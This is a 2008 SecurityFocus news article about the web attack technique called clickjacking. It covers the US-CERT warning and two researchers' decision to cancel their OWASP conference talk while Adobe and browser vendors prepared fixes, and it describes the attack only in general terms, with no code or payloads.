, SecurityFocus 2008-09-30
What's the harm in clicking on a button?
That's the central question being discussed by security professionals following the cancellation of a presentation on user-interface overlays -- or "clickjacking" as some have dubbed the threat -- at last week's Open Web Application Security Project (OWASP) AppSec conference in New York City.
On Friday, the U.S. Computer Emergency Readiness Team (US-CERT) warned network administrators to beware of the technique.
"Clickjacking gives an attacker the ability to trick a user into clicking on something only barely or momentarily noticeable," the group stated. "Therefore, if a user clicks on a web page, they may actually be clicking on content from another page."
Two researchers, Robert Hansen and Jeremiah Grossman, planned at AppSec to discuss the threat of using Web graphics to persuade a victim to click where an attacker wants on a page. The technique, which is also known as well as user-interface (UI) redressing and IFRAME overlay, can be used by an attacker to hide a button or link on a legitimate page, such as a bank's account page or Web mail application, using other Web content to mask the page's context.
A Web user might think, for example, that they are clicking on a button to close a dialog box, when the button press in reality deletes all their e-mail messages in Gmail. Or, a user might believe they are clicking on a button to decline to take a survey, when they are actually transferring money from their bank. The technique could be used to raise an article's Digg score or get paid for a pay-for-click advertisement, said Grossman, the chief technology officer for Web security firm White Hat Security.
"The list is virtually endless and these are the more relatively harmless examples," he told SecurityFocus in an e-mail interview. "Next consider that an attack can invisibly hover these buttons below the users mouse, so that when the clicks on something the visually see, they actually are clicking on something the attacker wants them to. Now, what could the bad guy potentially do with that ability? The more we researched, the worse the exploits become."
Hansen and Grossman canceled their presentation after demonstrating to software maker Adobe that one of its products could be affected by the attack.
"While they saw this issue as primarily a web browser issue, they showed us that one of their demos included an Adobe product," David Lenoe, a program manager for Adobe's Product Security Incident Response Team (PSIRT), said in a blog post. "We worked together with Robert and Jeremiah to assess the impact of this issue, and they determined that it was in our customers best interest to refrain from making this issue public until Adobe and web browser vendors have a chance to provide a fix or fixes to our mutual customers."